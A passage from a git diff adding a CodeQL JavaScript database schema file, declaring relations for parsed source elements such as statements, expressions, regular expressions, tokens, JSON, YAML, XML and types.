constructor/call/index + int index: int ref, // ordering of overloaded signatures + int sig: @signature_type ref +); + +#keyset[parent, index] +signature_contains_type ( + int child: @type ref, + int parent: @signature_type ref, + int index: int ref +); + +#keyset[sig, index] +signature_parameter_name ( + int sig: @signature_type ref, + int index: int ref, + varchar(900) name: string ref +); + +number_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +string_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +base_type_names( + int typeName: @symbol ref, + int baseTypeName: @symbol ref +); + +self_types( + int typeName: @symbol ref, + int selfType: @type_reference ref +); + +tuple_type_min_length( + unique int typ: @type ref, + int minLength: int ref +); + +tuple_type_rest_index( + unique int typ: @type ref, + int index: int ref +); + +// comments +comments (unique int id: @comment, + int kind: int ref, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(900) tostring: string ref); + +case @comment.kind of + 0 = @slashslash_comment +| 1 = @slashstar_comment +| 2 = @doc_comment +| 3 = @html_comment_start +| 4 = @htmlcommentend; + +@html_comment = @html_comment_start | @htmlcommentend; +@line_comment = @slashslash_comment | @html_comment; +@block_comment = @slashstar_comment | @doc_comment; + +// source lines +lines (unique int id: @line, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(2) terminator: string ref); +indentation (int file: @file ref, + int lineno: int ref, + varchar(1) indentChar: string ref, + int indentDepth: int ref); + +// JavaScript parse errors +js_parse_errors (unique int id: @js_parse_error, + int toplevel: @toplevel ref, + varchar(900) message: string ref, + varchar(900) line: string ref); + +// regular expressions +#keyset[parent, idx] +regexpterm (unique int id: @regexpterm, + int kind: int ref, + int parent: @regexpparent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr; + +case @regexpterm.kind of + 0 = @regexp_alt +| 1 = @regexp_seq +| 2 = @regexp_caret +| 3 = @regexp_dollar +| 4 = @regexp_wordboundary +| 5 = @regexp_nonwordboundary +| 6 = @regexp_positive_lookahead +| 7 = @regexp_negative_lookahead +| 8 = @regexp_star +| 9 = @regexp_plus +| 10 = @regexp_opt +| 11 = @regexp_range +| 12 = @regexp_dot +| 13 = @regexp_group +| 14 = @regexp_normal_constant +| 15 = @regexp_hex_escape +| 16 = @regexp_unicode_escape +| 17 = @regexp_dec_escape +| 18 = @regexp_oct_escape +| 19 = @regexp_ctrl_escape +| 20 = @regexp_char_class_escape +| 21 = @regexp_id_escape +| 22 = @regexp_backref +| 23 = @regexp_char_class +| 24 = @regexp_char_range +| 25 = @regexp_positive_lookbehind +| 26 = @regexp_negative_lookbehind +| 27 = @regexp_unicode_property_escape; + +regexp_parse_errors (unique int id: @regexp_parse_error, + int regexp: @regexpterm ref, + varchar(900) message: string ref); + +@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range; +@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape; +@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape; +@regexp_constant = @regexp_normal_constant | @regexp_char_escape; +@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead; +@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind; +@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind; +@regexp_anchor = @regexp_dollar | @regexp_caret; + +is_greedy (int id: @regexp_quantifier ref); +range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref); +range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref); +is_capture (unique int id: @regexp_group ref, int number: int ref); +is_named_capture (unique int id: @regexp_group ref, string name: string ref); +is_inverted (int id: @regexp_char_class ref); +regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref); +char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref); +backref (unique int id: @regexp_backref ref, int value: int ref); +named_backref (unique int id: @regexp_backref ref, string name: string ref); +unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref); +unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref); + +// tokens +#keyset[toplevel, idx] +tokeninfo (unique int id: @token, + int kind: int ref, + int toplevel: @toplevel ref, + int idx: int ref, + varchar(900) value: string ref); + +case @token.kind of + 0 = @token_eof +| 1 = @token_null_literal +| 2 = @token_boolean_literal +| 3 = @token_numeric_literal +| 4 = @token_string_literal +| 5 = @token_regular_expression +| 6 = @token_identifier +| 7 = @token_keyword +| 8 = @token_punctuator; + +// associate comments with the token immediately following them (which may be EOF) +next_token (int comment: @comment ref, int token: @token ref); + +// JSON +#keyset[parent, idx] +json (unique int id: @json_value, + int kind: int ref, + int parent: @json_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +json_literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @json_value ref); + +json_properties (int obj: @json_object ref, + varchar(900) property: string ref, + int value: @json_value ref); + +json_errors (unique int id: @json_parse_error, + varchar(900) message: string ref); + +json_locations(unique int locatable: @json_locatable ref, + int location: @location_default ref); + +case @json_value.kind of + 0 = @json_null +| 1 = @json_boolean +| 2 = @json_number +| 3 = @json_string +| 4 = @json_array +| 5 = @json_object; + +@json_parent = @json_object | @json_array | @file; + +@json_locatable = @json_value | @json_parse_error; + +// locations +@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr; + +@locatable = @file + | @ast_node + | @comment + | @line + | @js_parse_error | @regexp_parse_error + | @regexpterm + | @json_locatable + | @token + | @cfg_node + | @jsdoc | @jsdoc_type_expr | @jsdoc_tag + | @yaml_locatable + | @xmllocatable + | @configLocatable + | @template_placeholder_tag; + +hasLocation (unique int locatable: @locatable ref, + int location: @location ref); + +// CFG +entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref); +exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref); +guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref); +case @guard_node.kind of + 0 = @falsy_guard +| 1 = @truthy_guard; +@condition_guard = @falsy_guard | @truthy_guard; + +@synthetic_cfg_node = @entry_node | @exit_node | @guard_node; +@cfg_node = @synthetic_cfg_node | @expr_parent; + +successor (int pred: @cfg_node ref, int succ: @cfg_node ref); + +// JSDoc comments +jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref); +#keyset[parent, idx] +jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref, + int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref); +jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); +jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); + +#keyset[parent, idx] +jsdoc_type_exprs (unique int id: @jsdoc_type_expr, + int kind: int ref, + int parent: @jsdoc_type_expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); +case @jsdoc_type_expr.kind of + 0 = @jsdoc_any_type_expr +| 1 = @jsdoc_null_type_expr +| 2 = @jsdoc_undefined_type_expr +| 3 = @jsdoc_unknown_type_expr +| 4 = @jsdoc_void_type_expr +| 5 = @jsdoc_named_type_expr +| 6 = @jsdoc_applied_type_expr +| 7 = @jsdoc_nullable_type_expr +| 8 = @jsdoc_non_nullable_type_expr +| 9 = @jsdoc_record_type_expr +| 10 = @jsdoc_array_type_expr +| 11 = @jsdoc_union_type_expr +| 12 = @jsdoc_function_type_expr +| 13 = @jsdoc_optional_type_expr +| 14 = @jsdoc_rest_type_expr +; + +#keyset[id, idx] +jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref); +jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref); +jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref); + +@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag; + +jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref); + +@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property; + +@optionalchainable = @call_expr | @propaccess; + +isOptionalChaining(int id: @optionalchainable ref); + +/** + * The time taken for the extraction of a file. + * This table contains non-deterministic content. + * + * The sum of the `time` column for each (`file`, `timerKind`) pair + * is the total time taken for extraction of `file`. The `extractionPhase` + * column provides a granular view of the extraction time of the file. + */ +extraction_time( + int file : @file ref, + // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`. + int extractionPhase: int ref, + // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds + int timerKind: int ref, + float time: float ref +) + +/** +* Non-timing related data for the extraction of a single file. +* This table contains non-deterministic content. +*/ +extraction_data( + int file : @file ref, + // the absolute path to the cache file + varchar(900) cacheFile: string ref, + boolean fromCache: boolean ref, + int length: int ref +) + +/*- YAML -*/ + +#keyset[parent, idx] +yaml (unique int id: @yaml_node, + int kind: int ref, + int parent: @yaml_node_parent ref, + int idx: int ref, + string tag: string ref, + string tostring: string ref); + +case @yaml_node.kind of + 0 = @yaml_scalar_node +| 1 = @yaml_mapping_node +| 2 = @yaml_sequence_node +| 3 = @yaml_alias_node +; + +@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; + +@yaml_node_parent = @yaml_collection_node | @file; + +yaml_anchors (unique int node: @yaml_node ref, + string anchor: string ref); + +yaml_aliases (unique int alias: @yaml_alias_node ref, + string target: string ref); + +yaml_scalars (unique int scalar: @yaml_scalar_node ref, + int style: int ref, + string value: string ref); + +yaml_errors (unique int id: @yaml_error, + string message: string ref); + +yaml_locations(unique int locatable: @yaml_locatable ref, + int location: @location_default ref); + +@yaml_locatable = @yaml_node | @yaml_error; + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/*- Configuration files with key value pairs -*/ + +configs( + unique int id: @config +); + +configNames( + unique int id: @configName, + int config: @config ref, + string name: string ref +); + +configValues( + unique int id: @configValue, + int config: @config ref, + string value: string ref +); + +configLocations( + int locatable: @configLocatable ref, + int location: @location_default ref +); + +@configLocatable = @config | @configName | @configValue; diff --git a/javascript/ql/lib/upgrades/c88c69174bd0dd4e95f1bcfbada68a2505e812c3/semmlecode.javascript.dbscheme b/javascript/ql/lib/upgrades/c88c69174bd0dd4e95f1bcfbada68a2505e812c3/semmlecode.javascript.dbscheme new file mode 100644 index 000000000000..5b5db607d20c --- /dev/null +++ b/javascript/ql/lib/upgrades/c88c69174bd0dd4e95f1bcfbada68a2505e812c3/semmlecode.javascript.dbscheme @@ -0,0 +1,1193 @@ +/*** Standard fragments ***/ + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- JavaScript-specific part -*/ + +@location = @location_default + +@sourceline = @locatable; + +filetype( + int file: @file ref, + string filetype: string ref +) + +// top-level code fragments +toplevels (unique int id: @toplevel, + int kind: int ref); + +is_externs (int toplevel: @toplevel ref); + +case @toplevel.kind of + 0 = @script +| 1 = @inline_script +| 2 = @event_handler +| 3 = @javascript_url +| 4 = @template_toplevel; + +is_module (int tl: @toplevel ref); +is_nodejs (int tl: @toplevel ref); +is_es2015_module (int tl: @toplevel ref); +is_closure_module (int tl: @toplevel ref); + +@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; +toplevel_parent_xml_node( + unique int toplevel: @toplevel ref, + int xmlnode: @xml_node_with_code ref); + +xml_element_parent_expression( + unique int xmlnode: @xmlelement ref, + int expression: @expr ref, + int index: int ref); + +// statements +#keyset[parent, idx] +stmts (unique int id: @stmt, + int kind: int ref, + int parent: @stmt_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +stmt_containers (unique int stmt: @stmt ref, + int container: @stmt_container ref); + +jump_targets (unique int jump: @stmt ref, + int target: @stmt ref); + +@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; +@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; + +case @stmt.kind of + 0 = @empty_stmt +| 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @labeled_stmt +| 5 = @break_stmt +| 6 = @continue_stmt +| 7 = @with_stmt +| 8 = @switch_stmt +| 9 = @return_stmt +| 10 = @throw_stmt +| 11 = @try_stmt +| 12 = @while_stmt +| 13 = @do_while_stmt +| 14 = @for_stmt +| 15 = @for_in_stmt +| 16 = @debugger_stmt +| 17 = @function_decl_stmt +| 18 = @var_decl_stmt +| 19 = @case +| 20 = @catch_clause +| 21 = @for_of_stmt +| 22 = @const_decl_stmt +| 23 = @let_stmt +| 24 = @legacy_let_stmt +| 25 = @for_each_stmt +| 26 = @class_decl_stmt +| 27 = @import_declaration +| 28 = @export_all_declaration +| 29 = @export_default_declaration +| 30 = @export_named_declaration +| 31 = @namespace_declaration +| 32 = @import_equals_declaration +| 33 = @export_assign_declaration +| 34 = @interface_declaration +| 35 = @type_alias_declaration +| 36 = @enum_declaration +| 37 = @external_module_declaration +| 38 = @export_as_namespace_declaration +| 39 = @global_augmentation_declaration +| 40 = @using_decl_stmt +; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; + +@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; + +@namespace_definition = @namespace_declaration | @enum_declaration; +@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; + +is_instantiated(unique int decl: @namespace_declaration ref); + +@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; +has_declare_keyword(unique int stmt: @declarable_node ref); + +is_for_await_of(unique int forof: @for_of_stmt ref); + +// expressions +#keyset[parent, idx] +exprs (unique int id: @expr, + int kind: int ref, + int parent: @expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @expr_or_type ref); + +enclosing_stmt (unique int expr: @expr_or_type ref, + int stmt: @stmt ref); + +expr_containers (unique int expr: @expr_or_type ref, + int container: @stmt_container ref); + +array_size (unique int ae: @arraylike ref, + int sz: int ref); + +is_delegating (int yield: @yield_expr ref); + +@expr_or_stmt = @expr | @stmt; +@expr_or_type = @expr | @typeexpr; +@expr_parent = @expr_or_stmt | @property | @function_typeexpr; +@arraylike = @array_expr | @array_pattern; +@type_annotation = @typeexpr | @jsdoc_type_expr; +@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; + +case @expr.kind of + 0 = @label +| 1 = @null_literal +| 2 = @boolean_literal +| 3 = @number_literal +| 4 = @string_literal +| 5 = @regexp_literal +| 6 = @this_expr +| 7 = @array_expr +| 8 = @obj_expr +| 9 = @function_expr +| 10 = @seq_expr +| 11 = @conditional_expr +| 12 = @new_expr +| 13 = @call_expr +| 14 = @dot_expr +| 15 = @index_expr +| 16 = @neg_expr +| 17 = @plus_expr +| 18 = @log_not_expr +| 19 = @bit_not_expr +| 20 = @typeof_expr +| 21 = @void_expr +| 22 = @delete_expr +| 23 = @eq_expr +| 24 = @neq_expr +| 25 = @eqq_expr +| 26 = @neqq_expr +| 27 = @lt_expr +| 28 = @le_expr +| 29 = @gt_expr +| 30 = @ge_expr +| 31 = @lshift_expr +| 32 = @rshift_expr +| 33 = @urshift_expr +| 34 = @add_expr +| 35 = @sub_expr +| 36 = @mul_expr +| 37 = @div_expr +| 38 = @mod_expr +| 39 = @bitor_expr +| 40 = @xor_expr +| 41 = @bitand_expr +| 42 = @in_expr +| 43 = @instanceof_expr +| 44 = @logand_expr +| 45 = @logor_expr +| 47 = @assign_expr +| 48 = @assign_add_expr +| 49 = @assign_sub_expr +| 50 = @assign_mul_expr +| 51 = @assign_div_expr +| 52 = @assign_mod_expr +| 53 = @assign_lshift_expr +| 54 = @assign_rshift_expr +| 55 = @assign_urshift_expr +| 56 = @assign_or_expr +| 57 = @assign_xor_expr +| 58 = @assign_and_expr +| 59 = @preinc_expr +| 60 = @postinc_expr +| 61 = @predec_expr +| 62 = @postdec_expr +| 63 = @par_expr +| 64 = @var_declarator +| 65 = @arrow_function_expr +| 66 = @spread_element +| 67 = @array_pattern +| 68 = @object_pattern +| 69 = @yield_expr +| 70 = @tagged_template_expr +| 71 = @template_literal +| 72 = @template_element +| 73 = @array_comprehension_expr +| 74 = @generator_expr +| 75 = @for_in_comprehension_block +| 76 = @for_of_comprehension_block +| 77 = @legacy_letexpr +| 78 = @var_decl +| 79 = @proper_varaccess +| 80 = @class_expr +| 81 = @super_expr +| 82 = @newtarget_expr +| 83 = @named_import_specifier +| 84 = @import_default_specifier +| 85 = @import_namespace_specifier +| 86 = @named_export_specifier +| 87 = @exp_expr +| 88 = @assign_exp_expr +| 89 = @jsx_element +| 90 = @jsx_qualified_name +| 91 = @jsx_empty_expr +| 92 = @await_expr +| 93 = @function_sent_expr +| 94 = @decorator +| 95 = @export_default_specifier +| 96 = @export_namespace_specifier +| 97 = @bind_expr +| 98 = @external_module_reference +| 99 = @dynamic_import +| 100 = @expression_with_type_arguments +| 101 = @prefix_type_assertion +| 102 = @as_type_assertion +| 103 = @export_varaccess +| 104 = @decorator_list +| 105 = @non_null_assertion +| 106 = @bigint_literal +| 107 = @nullishcoalescing_expr +| 108 = @e4x_xml_anyname +| 109 = @e4x_xml_static_attribute_selector +| 110 = @e4x_xml_dynamic_attribute_selector +| 111 = @e4x_xml_filter_expression +| 112 = @e4x_xml_static_qualident +| 113 = @e4x_xml_dynamic_qualident +| 114 = @e4x_xml_dotdotexpr +| 115 = @import_meta_expr +| 116 = @assignlogandexpr +| 117 = @assignlogorexpr +| 118 = @assignnullishcoalescingexpr +| 119 = @template_pipe_ref +| 120 = @generated_code_expr +| 121 = @satisfies_expr +; + +@varaccess = @proper_varaccess | @export_varaccess; +@varref = @var_decl | @varaccess; + +@identifier = @label | @varref | @type_identifier; + +@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; + +@propaccess = @dot_expr | @index_expr; + +@invokeexpr = @new_expr | @call_expr; + +@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; + +@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; + +@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; + +@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | @mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; + +@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; + +@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; + +@pattern = @varref | @array_pattern | @object_pattern; + +@comprehension_expr = @array_comprehension_expr | @generator_expr; + +@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; + +@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; + +@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; + +@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; + +@type_assertion = @as_type_assertion | @prefix_type_assertion; + +@class_definition = @class_decl_stmt | @class_expr; +@interface_definition = @interface_declaration | @interface_typeexpr; +@class_or_interface = @class_definition | @interface_definition; + +@lexical_decl = @var_decl | @type_decl; +@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; +@lexical_ref = @lexical_decl | @lexical_access; + +@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; +@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; + +expr_contains_template_tag_location( + int expr: @expr ref, + int location: @location ref +); + +@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; + +template_placeholder_tag_info( + unique int node: @template_placeholder_tag, + int parentNode: @template_placeholder_tag_parent ref, + varchar(900) raw: string ref +); + +// scopes +scopes (unique int id: @scope, + int kind: int ref); + +case @scope.kind of + 0 = @global_scope +| 1 = @function_scope +| 2 = @catch_scope +| 3 = @module_scope +| 4 = @block_scope +| 5 = @for_scope +| 6 = @for_in_scope // for-of scopes work the same as for-in scopes +| 7 = @comprehension_block_scope +| 8 = @class_expr_scope +| 9 = @namespace_scope +| 10 = @class_decl_scope +| 11 = @interface_scope +| 12 = @type_alias_scope +| 13 = @mapped_type_scope +| 14 = @enum_scope +| 15 = @external_module_scope +| 16 = @conditional_type_scope; + +scopenodes (unique int node: @ast_node ref, + int scope: @scope ref); + +scopenesting (unique int inner: @scope ref, + int outer: @scope ref); + +// functions +@function = @function_decl_stmt | @function_expr | @arrow_function_expr; + +@parameterized = @function | @catch_clause; +@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; + +is_generator (int fun: @function ref); +has_rest_parameter (int fun: @function ref); +is_async (int fun: @function ref); + +// variables and lexically scoped type names +#keyset[scope, name] +variables (unique int id: @variable, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_type_names (unique int id: @local_type_name, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_namespace_names (unique int id: @local_namespace_name, + varchar(900) name: string ref, + int scope: @scope ref); + +is_arguments_object (int id: @variable ref); + +@lexical_name = @variable | @local_type_name | @local_namespace_name; + +@bind_id = @varaccess | @local_var_type_access; +bind (unique int id: @bind_id ref, + int decl: @variable ref); + +decl (unique int id: @var_decl ref, + int decl: @variable ref); + +@typebind_id = @local_type_access | @export_varaccess; +typebind (unique int id: @typebind_id ref, + int decl: @local_type_name ref); + +@typedecl_id = @type_decl | @var_decl; +typedecl (unique int id: @typedecl_id ref, + int decl: @local_type_name ref); + +namespacedecl (unique int id: @var_decl ref, + int decl: @local_namespace_name ref); + +@namespacebind_id = @local_namespace_access | @export_varaccess; +namespacebind (unique int id: @namespacebind_id ref, + int decl: @local_namespace_name ref); + + +// properties in object literals, property patterns in object patterns, and method declarations in classes +#keyset[parent, index] +properties (unique int id: @property, + int parent: @property_parent ref, + int index: int ref, + int kind: int ref, + varchar(900) tostring: string ref); + +case @property.kind of + 0 = @value_property +| 1 = @property_getter +| 2 = @property_setter +| 3 = @jsx_attribute +| 4 = @function_call_signature +| 5 = @constructor_call_signature +| 6 = @index_signature +| 7 = @enum_member +| 8 = @proper_field +| 9 = @parameter_field +| 10 = @static_initializer +; + +@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; +@property_accessor = @property_getter | @property_setter; +@call_signature = @function_call_signature | @constructor_call_signature; +@field = @proper_field | @parameter_field; +@field_or_vardeclarator = @field | @var_declarator; + +is_computed (int id: @property ref); +is_method (int id: @property ref); +is_static (int id: @property ref); +is_abstract_member (int id: @property ref); +is_const_enum (int id: @enum_declaration ref); +is_abstract_class (int id: @class_decl_stmt ref); + +has_public_keyword (int id: @property ref); +has_private_keyword (int id: @property ref); +has_protected_keyword (int id: @property ref); +has_readonly_keyword (int id: @property ref); +has_type_keyword (int id: @type_keyword_operand ref); +is_optional_member (int id: @property ref); +has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); +is_optional_parameter_declaration (unique int parameter: @pattern ref); + +#keyset[constructor, param_index] +parameter_fields( + unique int field: @parameter_field ref, + int constructor: @function_expr ref, + int param_index: int ref +); + +// types +#keyset[parent, idx] +typeexprs ( + unique int id: @typeexpr, + int kind: int ref, + int parent: @typeexpr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref +); + +case @typeexpr.kind of + 0 = @local_type_access +| 1 = @type_decl +| 2 = @keyword_typeexpr +| 3 = @string_literal_typeexpr +| 4 = @number_literal_typeexpr +| 5 = @boolean_literal_typeexpr +| 6 = @array_typeexpr +| 7 = @union_typeexpr +| 8 = @indexed_access_typeexpr +| 9 = @intersection_typeexpr +| 10 = @parenthesized_typeexpr +| 11 = @tuple_typeexpr +| 12 = @keyof_typeexpr +| 13 = @qualified_type_access +| 14 = @generic_typeexpr +| 15 = @type_label +| 16 = @typeof_typeexpr +| 17 = @local_var_type_access +| 18 = @qualified_var_type_access +| 19 = @this_var_type_access +| 20 = @predicate_typeexpr +| 21 = @interface_typeexpr +| 22 = @type_parameter +| 23 = @plain_function_typeexpr +| 24 = @constructor_typeexpr +| 25 = @local_namespace_access +| 26 = @qualified_namespace_access +| 27 = @mapped_typeexpr +| 28 = @conditional_typeexpr +| 29 = @infer_typeexpr +| 30 = @import_type_access +| 31 = @import_namespace_access +| 32 = @import_var_type_access +| 33 = @optional_typeexpr +| 34 = @rest_typeexpr +| 35 = @bigint_literal_typeexpr +| 36 = @readonly_typeexpr +| 37 = @template_literal_typeexpr +; + +@typeref = @typeaccess | @type_decl; +@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; +@typeexpr_parent = @expr | @stmt | @property | @typeexpr; +@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; +@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; +@vartypeaccess = @local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; +@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; +@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; + +@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; + +// types +types ( + unique int id: @type, + int kind: int ref, + varchar(900) tostring: string ref +); + +#keyset[parent, idx] +type_child ( + int child: @type ref, + int parent: @type ref, + int idx: int ref +); + +case @type.kind of + 0 = @any_type +| 1 = @string_type +| 2 = @number_type +| 3 = @union_type +| 4 = @true_type +| 5 = @false_type +| 6 = @type_reference +| 7 = @object_type +| 8 = @canonical_type_variable_type +| 9 = @typeof_type +| 10 = @void_type +| 11 = @undefined_type +| 12 = @null_type +| 13 = @never_type +| 14 = @plain_symbol_type +| 15 = @unique_symbol_type +| 16 = @objectkeyword_type +| 17 = @intersection_type +| 18 = @tuple_type +| 19 = @lexical_type_variable_type +| 20 = @this_type +| 21 = @number_literal_type +| 22 = @string_literal_type +| 23 = @unknown_type +| 24 = @bigint_type +| 25 = @bigint_literal_type +; + +@boolean_literal_type = @true_type | @false_type; +@symbol_type = @plain_symbol_type | @unique_symbol_type; +@union_or_intersection_type = @union_type | @intersection_type; +@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; + +has_asserts_keyword(int node: @predicate_typeexpr ref); + +@typed_ast_node = @expr | @typeexpr | @function; +ast_node_type( + unique int node: @typed_ast_node ref, + int typ: @type ref); + +declared_function_signature( + unique int node: @function ref, + int sig: @signature_type ref +); + +invoke_expr_signature( + unique int node: @invokeexpr ref, + int sig: @signature_type ref +); + +invoke_expr_overload_index( + unique int node: @invokeexpr ref, + int index: int ref +); + +symbols ( + unique int id: @symbol, + int kind: int ref, + varchar(900) name: string ref +); + +symbol_parent ( + unique int symbol: @symbol ref, + int parent: @symbol ref +); + +symbol_module ( + int symbol: @symbol ref, + varchar(900) moduleName: string ref +); + +symbol_global ( + int symbol: @symbol 